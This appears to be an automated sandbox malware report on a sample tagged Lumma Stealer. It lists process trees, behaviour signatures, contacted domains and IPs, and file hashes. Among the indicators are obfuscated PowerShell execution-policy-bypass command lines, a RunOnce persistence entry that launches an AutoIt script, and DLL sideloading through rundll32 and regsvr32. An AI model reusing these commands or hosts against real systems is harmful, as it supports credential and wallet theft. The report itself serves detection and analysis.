| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Set-up.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\more.com | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Set-up.exe
"C:\Users\Admin\AppData\Local\Temp\Set-up.exe"
C:\Windows\SysWOW64\more.com
C:\Windows\SysWOW64\more.com
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -exec bypass -f "C:\Users\Admin\AppData\Local\Temp\O93LZ727PJ79L0E0TL1CJ7.ps1"
C:\Users\Admin\AppData\Roaming\RDJUYV.pif
"C:\Users\Admin\AppData\Roaming\RDJUYV.pif" "C:\Users\Admin\AppData\Roaming\79AFBM.xlsx"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOPrOF -Ep BYPAss -W hI -eNc ...
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mindfuljournal.shop | udp |
| US | 172.67.143.13:443 | mindfuljournal.shop | tcp |
| US | 172.67.143.13:443 | mindfuljournal.shop | tcp |
| US | 172.67.143.13:443 | mindfuljournal.shop | tcp |
| US | 8.8.8.8:53 | 13.143.67.172.in-addr.arpa | udp |
| US | 172.67.143.13:443 | mindfuljournal.shop | tcp |
| US | 172.67.143.13:443 | mindfuljournal.shop | tcp |
| US | 172.67.143.13:443 | mindfuljournal.shop | tcp |
| US | 8.8.8.8:53 | cdn1.pixel-story.shop | udp |
| US | 104.21.32.85:443 | cdn1.pixel-story.shop | tcp |
| US | 8.8.8.8:53 | pixelpalette.shop | udp |
| US | 104.21.84.104:443 | pixelpalette.shop | tcp |
| US | 8.8.8.8:53 | 85.32.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.84.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mindfusteps.shop | udp |
| MD | 213.159.73.34:443 | mindfusteps.shop | tcp |
| US | 8.8.8.8:53 | 34.73.159.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| AM | 217.144.184.19:1466 | | tcp |
| US | 8.8.8.8:53 | 109.234.82.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.184.144.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| AM | 217.144.184.19:1466 | | tcp |
Files
memory/1852-0-0x0000000074550000-0x00000000747E1000-memory.dmp
memory/1852-1-0x00007FFC453F0000-0x00007FFC455E5000-memory.dmp
memory/1852-8-0x0000000074563000-0x0000000074565000-memory.dmp
memory/1852-9-0x0000000074550000-0x00000000747E1000-memory.dmp
memory/1852-10-0x0000000074550000-0x00000000747E1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\13821335
| MD5 | f7b47df6923eabe96417f277c97f32bf |
| SHA1 | b031c79c7b8a2585d6c1eff80674b09eca5fc154 |
| SHA256 | bbb3a5fa0a62a0c0c33b053b506866b62511f21966a4dd6777bb70a2c4b7267d |
| SHA512 | 54f9584215ba5b1646b1c7d0f23c14793de4831c01214ca9f5828235dc366cbbdaeecc0b940a5ca3df4d458c14e7a881d9528671ef8bcc37baf758a6073914b4 |
memory/4192-12-0x0000000074550000-0x00000000747E1000-memory.dmp
memory/4192-14-0x00007FFC453F0000-0x00007FFC455E5000-memory.dmp
memory/4192-15-0x0000000074550000-0x00000000747E1000-memory.dmp
memory/4192-16-0x0000000074550000-0x00000000747E1000-memory.dmp
memory/4192-18-0x0000000074550000-0x00000000747E1000-memory.dmp
memory/4688-19-0x00007FFC453F0000-0x00007FFC455E5000-memory.dmp
memory/4688-20-0x00000000003D0000-0x0000000000429000-memory.dmp
memory/4688-21-0x0000000000BBF000-0x0000000000BC7000-memory.dmp
memory/4688-25-0x00000000003D0000-0x0000000000429000-memory.dmp
memory/3248-27-0x00000000748BE000-0x00000000748BF000-memory.dmp
memory/3248-28-0x0000000002960000-0x0000000002996000-memory.dmp
memory/3248-35-0x00000000748B0000-0x0000000075060000-memory.dmp
memory/4688-30-0x0000000003D20000-0x0000000003D59000-memory.dmp
memory/3248-36-0x0000000005130000-0x0000000005758000-memory.dmp
memory/4688-29-0x0000000003D20000-0x0000000003D59000-memory.dmp
memory/3248-37-0x0000000004F60000-0x0000000004F82000-memory.dmp
memory/3248-38-0x0000000005760000-0x00000000057C6000-memory.dmp
memory/3248-39-0x00000000057D0000-0x0000000005836000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zuemf0qc.2fv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3248-49-0x0000000005940000-0x0000000005C94000-memory.dmp
memory/3248-50-0x0000000005F10000-0x0000000005F2E000-memory.dmp
memory/3248-51-0x0000000005FC0000-0x000000000600C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\O93LZ727PJ79L0E0TL1CJ7.ps1
| MD5 | a93ef812fcdf3af24ff8b33a75d4992e |
| SHA1 | b282892bd321a8709474f43d790d7e661edaa98f |
| SHA256 | d5a89ca10e0e354df724efa955616b27501534cd5153f3c387c9d569a73cdbc6 |
| SHA512 | 272da3e9cb498541454f381d360e4dd47498ecf1f604844dcaea21316a3f37547688f52439d38bb6208f513ba8fc9e442b82cbb622c6579323530c342853b037 |
C:\Users\Admin\AppData\Roaming\RDJUYV.pif
| MD5 | 3f58a517f1f4796225137e7659ad2adb |
| SHA1 | e264ba0e9987b0ad0812e5dd4dd3075531cfe269 |
| SHA256 | 1da298cab4d537b0b7b5dabf09bff6a212b9e45731e0cc772f99026005fb9e48 |
| SHA512 | acf740aafce390d06c6a76c84e7ae7c0f721731973aadbe3e57f2eb63241a01303cc6bf11a3f9a88f8be0237998b5772bdaf569137d63ba3d0f877e7d27fc634 |
C:\Users\Admin\AppData\Roaming\79AFBM.xlsx
| MD5 | 3c6d0866e54ab391bc09713fde4c9d38 |
| SHA1 | a1a4e9c067e3c85739e85fb45f7ecdb363bcf856 |
| SHA256 | ffe15bff44969541749b01e1ab80492c95990bf4af35fb62e0d93bf6a4b81682 |
| SHA512 | eebf8ca2e3d778ca9706276b26c4d3daedf9cb7067d695cbf9e07755e6887e782d25a8aa6785034052b39105518c69f7e09b12c8199e58d13fcaf6b7f82b58b4 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 5315900105942deb090a358a315b06fe |
| SHA1 | 22fe5d2e1617c31afbafb91c117508d41ef0ce44 |
| SHA256 | e8bd7d8d1d0437c71aceb032f9fb08dd1147f41c048540254971cc60e95d6cd7 |
| SHA512 | 77e8d15b8c34a1cb01dbee7147987e2cc25c747e0f80d254714a93937a6d2fe08cb5a772cf85ceb8fec56415bfa853234a003173718c4229ba8cfcf2ce6335a6 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win7-20240903-en
Max time kernel
120s
Max time network
121s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2292 wrote to memory of 2192 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\contactsUX.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\contactsUX.dll
Network
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
153s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4900 wrote to memory of 3388 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\msncore.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\msncore.dll
Network
Files
Analysis: behavioral15
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win7-20240903-en
Max time kernel
120s
Max time network
125s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2400 wrote to memory of 2532 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libdirectsound_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libdirectsound_plugin.dll,#1
Network
Files
Analysis: behavioral24
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win10v2004-20241007-en
Max time kernel
95s
Max time network
141s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4848 wrote to memory of 968 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d11_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d11_plugin.dll,#1
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win7-20240903-en
Max time kernel
134s
Max time network
119s
Command Line
Signatures
Lumma Stealer, LummaC
Lumma family
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\9A2VOZ.pif | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | N/A |
Uses the VBS compiler for execution
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\dbabech = "\"C:\\ehfecbk\\AutoIt3.exe\" C:\\ehfecbk\\dbabech.a3x" | C:\Users\Admin\AppData\Roaming\9A2VOZ.pif | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2308 set thread context of 492 | N/A | C:\Users\Admin\AppData\Local\Temp\Set-up.exe | C:\Windows\SysWOW64\more.com |
Browser Information Discovery
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\9A2VOZ.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Set-up.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\more.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\9A2VOZ.pif | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Roaming\9A2VOZ.pif | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Set-up.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\more.com | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\9A2VOZ.pif | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Set-up.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\more.com | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Set-up.exe
"C:\Users\Admin\AppData\Local\Temp\Set-up.exe"
C:\Windows\SysWOW64\more.com
C:\Windows\SysWOW64\more.com
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -exec bypass -f "C:\Users\Admin\AppData\Local\Temp\3O6QTUU1MR033UWI6MBVM5Z.ps1"
C:\Users\Admin\AppData\Roaming\9A2VOZ.pif
"C:\Users\Admin\AppData\Roaming\9A2VOZ.pif" "C:\Users\Admin\AppData\Roaming\N67EEG.xlsx"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | mindfuljournal.shop | udp |
| US | 104.21.79.92:443 | mindfuljournal.shop | tcp |
| US | 8.8.8.8:53 | cdn1.pixel-story.shop | udp |
| US | 172.67.185.54:443 | cdn1.pixel-story.shop | tcp |
| US | 8.8.8.8:53 | pixelpalette.shop | udp |
| US | 104.21.84.104:443 | pixelpalette.shop | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\c44e025e
| MD5 | 51ce6bb7811c2cb519df4248405e4724 |
| SHA1 | 237195ac7a01b2db385b09ebad099c77ee9780e7 |
| SHA256 | c07ff059a3774eb806e8c74eaba95e64ba4768cae00335a9eb9bd350ee220deb |
| SHA512 | c2cb5517d2e568db6adff52abfa6c99ef6993392cb54616765e5a0e90d57468a53c36e83af96baf030c6b4d6b9d3dde549e60ba73527f18161a6b203aa2b2347 |
C:\Users\Admin\AppData\Local\Temp\3O6QTUU1MR033UWI6MBVM5Z.ps1
| MD5 | a93ef812fcdf3af24ff8b33a75d4992e |
| SHA1 | b282892bd321a8709474f43d790d7e661edaa98f |
| SHA256 | d5a89ca10e0e354df724efa955616b27501534cd5153f3c387c9d569a73cdbc6 |
| SHA512 | 272da3e9cb498541454f381d360e4dd47498ecf1f604844dcaea21316a3f37547688f52439d38bb6208f513ba8fc9e442b82cbb622c6579323530c342853b037 |
\Users\Admin\AppData\Roaming\9A2VOZ.pif
| MD5 | 3f58a517f1f4796225137e7659ad2adb |
| SHA1 | e264ba0e9987b0ad0812e5dd4dd3075531cfe269 |
| SHA256 | 1da298cab4d537b0b7b5dabf09bff6a212b9e45731e0cc772f99026005fb9e48 |
| SHA512 | acf740aafce390d06c6a76c84e7ae7c0f721731973aadbe3e57f2eb63241a01303cc6bf11a3f9a88f8be0237998b5772bdaf569137d63ba3d0f877e7d27fc634 |
C:\Users\Admin\AppData\Roaming\N67EEG.xlsx
| MD5 | 3c6d0866e54ab391bc09713fde4c9d38 |
| SHA1 | a1a4e9c067e3c85739e85fb45f7ecdb363bcf856 |
| SHA256 | ffe15bff44969541749b01e1ab80492c95990bf4af35fb62e0d93bf6a4b81682 |
| SHA512 | eebf8ca2e3d778ca9706276b26c4d3daedf9cb7067d695cbf9e07755e6887e782d25a8aa6785034052b39105518c69f7e09b12c8199e58d13fcaf6b7f82b58b4 |
Analysis: behavioral7
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win7-20241010-en
Max time kernel
118s
Max time network
123s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2520 wrote to memory of 2524 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\msncore.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\msncore.dll
Network
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win10v2004-20241007-en
Max time kernel
92s
Max time network
140s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3580 wrote to memory of 3216 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libfilesystem_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libfilesystem_plugin.dll,#1
Network
Files
Analysis: behavioral22
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
140s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5052 wrote to memory of 2868 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libd3d11va_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libd3d11va_plugin.dll,#1
Network
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win7-20240903-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 876 wrote to memory of 1712 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d9_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d9_plugin.dll,#1
Network
Files
Analysis: behavioral26
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win10v2004-20241007-en
Max time kernel
94s
Max time network
137s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4144 wrote to memory of 4328 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d9_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d9_plugin.dll,#1
Network
Files
Analysis: behavioral30
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win10v2004-20241007-en
Max time kernel
90s
Max time network
143s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3100 wrote to memory of 2284 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libvmem_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libvmem_plugin.dll,#1
Network
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
151s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3056 wrote to memory of 1776 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\msvcr80.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\msvcr80.dll,#1
Network
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:21
Platform
win7-20241010-en
Max time kernel
121s
Max time network
129s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2876 wrote to memory of 2316 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2876 wrote to memory of 2316 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2876 wrote to memory of 2316 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2876 wrote to memory of 2316 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2876 wrote to memory of 2316 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2876 wrote to memory of 2316 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2876 wrote to memory of 2316 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libimem_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libimem_plugin.dll,#1
Network
Files
Analysis: behavioral19
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win7-20240903-en
Max time kernel
119s
Max time network
121s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2084 wrote to memory of 1688 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2084 wrote to memory of 1688 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2084 wrote to memory of 1688 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2084 wrote to memory of 1688 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2084 wrote to memory of 1688 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2084 wrote to memory of 1688 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2084 wrote to memory of 1688 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libavcodec_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libavcodec_plugin.dll,#1
Network
Files
Analysis: behavioral21
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win7-20241010-en
Max time kernel
117s
Max time network
121s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2224 wrote to memory of 2380 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2224 wrote to memory of 2380 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2224 wrote to memory of 2380 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2224 wrote to memory of 2380 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2224 wrote to memory of 2380 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2224 wrote to memory of 2380 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
